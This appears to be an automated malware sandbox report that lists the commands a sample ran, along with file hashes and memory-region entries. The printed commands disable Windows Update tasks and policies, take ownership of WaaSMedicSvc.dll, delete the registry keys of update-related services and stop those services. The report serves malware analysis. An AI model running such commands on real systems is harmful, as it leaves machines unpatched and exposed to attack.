C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE1⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\sc.exesc stop bits1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
2.0MB
MD579dbc1a54d33366681f1e926d565cad4
SHA1907cf0ec6784bf140f9759d6931d3697da0fc229
SHA256465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
SHA5126d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
-
C:\Program Files\Windows\services.exeFilesize
2.0MB
MD579dbc1a54d33366681f1e926d565cad4
SHA1907cf0ec6784bf140f9759d6931d3697da0fc229
SHA256465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
SHA5126d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/516-209-0x0000000000000000-mapping.dmp
-
memory/516-225-0x0000022B21940000-0x0000022B2195C000-memory.dmpFilesize
112KB
-
memory/516-231-0x0000022B22860000-0x0000022B22919000-memory.dmpFilesize
740KB
-
memory/516-265-0x0000022B21960000-0x0000022B2196A000-memory.dmpFilesize
40KB
-
memory/880-208-0x0000000000000000-mapping.dmp
-
memory/1384-387-0x0000000000000000-mapping.dmp
-
memory/1384-179-0x0000000000000000-mapping.dmp
-
memory/1644-360-0x0000000000000000-mapping.dmp
-
memory/1780-195-0x0000000000000000-mapping.dmp
-
memory/1876-174-0x0000000000000000-mapping.dmp
-
memory/1892-380-0x0000000000000000-mapping.dmp
-
memory/1896-381-0x0000000000000000-mapping.dmp
-
memory/1920-379-0x0000000000000000-mapping.dmp
-
memory/1972-172-0x0000000000000000-mapping.dmp
-
memory/2004-358-0x0000000000000000-mapping.dmp
-
memory/2144-363-0x0000000000000000-mapping.dmp
-
memory/2488-365-0x0000000000000000-mapping.dmp
-
memory/2600-372-0x0000000000000000-mapping.dmp
-
memory/2764-357-0x0000000000000000-mapping.dmp
-
memory/2860-378-0x0000000000000000-mapping.dmp
-
memory/2884-175-0x0000000000000000-mapping.dmp
-
memory/2992-167-0x0000000000000000-mapping.dmp
-
memory/3080-171-0x0000000000000000-mapping.dmp
-
memory/3248-196-0x0000000000000000-mapping.dmp
-
memory/3320-192-0x0000000000000000-mapping.dmp
-
memory/3344-187-0x0000000000000000-mapping.dmp
-
memory/3500-377-0x0000000000000000-mapping.dmp
-
memory/3536-178-0x0000000000000000-mapping.dmp
-
memory/3560-383-0x0000000000000000-mapping.dmp
-
memory/3620-385-0x0000000000000000-mapping.dmp
-
memory/3700-181-0x0000000000000000-mapping.dmp
-
memory/3736-182-0x0000000000000000-mapping.dmp
-
memory/3748-388-0x0000000000000000-mapping.dmp
-
memory/3864-375-0x0000000000000000-mapping.dmp
-
memory/3952-122-0x00000260ED0D0000-0x00000260ED2AC000-memory.dmpFilesize
1.9MB
-
memory/3952-117-0x00000260D2530000-0x00000260D270D000-memory.dmpFilesize
1.9MB
-
memory/4012-394-0x0000023A84830000-0x0000023A84836000-memory.dmpFilesize
24KB
-
memory/4012-397-0x0000023A84100000-0x0000023A84107000-memory.dmpFilesize
28KB
-
memory/4068-194-0x0000000000000000-mapping.dmp
-
memory/4084-176-0x0000000000000000-mapping.dmp
-
memory/4120-168-0x0000000000000000-mapping.dmp
-
memory/4328-193-0x0000000000000000-mapping.dmp
-
memory/4380-197-0x0000000000000000-mapping.dmp
-
memory/4440-184-0x0000000000000000-mapping.dmp
-
memory/4452-130-0x0000000000000000-mapping.dmp
-
memory/4452-139-0x000001F4F38B0000-0x000001F4F3926000-memory.dmpFilesize
472KB
-
memory/4452-136-0x000001F4DAC90000-0x000001F4DACB2000-memory.dmpFilesize
136KB
-
memory/4464-129-0x0000000000000000-mapping.dmp
-
memory/4540-191-0x0000000000000000-mapping.dmp
-
memory/4568-376-0x0000025297A20000-0x0000025297A32000-memory.dmpFilesize
72KB
-
memory/4568-364-0x00000252978D0000-0x00000252978D6000-memory.dmpFilesize
24KB
-
memory/4668-361-0x0000000000000000-mapping.dmp
-
memory/4688-362-0x0000000000000000-mapping.dmp
-
memory/4720-180-0x0000000000000000-mapping.dmp
-
memory/4728-359-0x0000000000000000-mapping.dmp
-
memory/4748-382-0x0000000000000000-mapping.dmp
-
memory/4828-170-0x0000000000000000-mapping.dmp
-
memory/4832-374-0x0000000000000000-mapping.dmp
-
memory/4844-177-0x0000000000000000-mapping.dmp
-
memory/4880-188-0x0000000000000000-mapping.dmp
-
memory/4892-386-0x0000000000000000-mapping.dmp
-
memory/4924-371-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4924-367-0x0000000000401BEA-mapping.dmp
-
memory/4924-366-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4976-189-0x0000000000000000-mapping.dmp
-
memory/4984-173-0x0000000000000000-mapping.dmp
-
memory/5040-356-0x0000000000000000-mapping.dmp
-
memory/5092-190-0x0000000000000000-mapping.dmp
-
memory/5104-373-0x0000000000000000-mapping.dmp
-
memory/5112-169-0x0000000000000000-mapping.dmp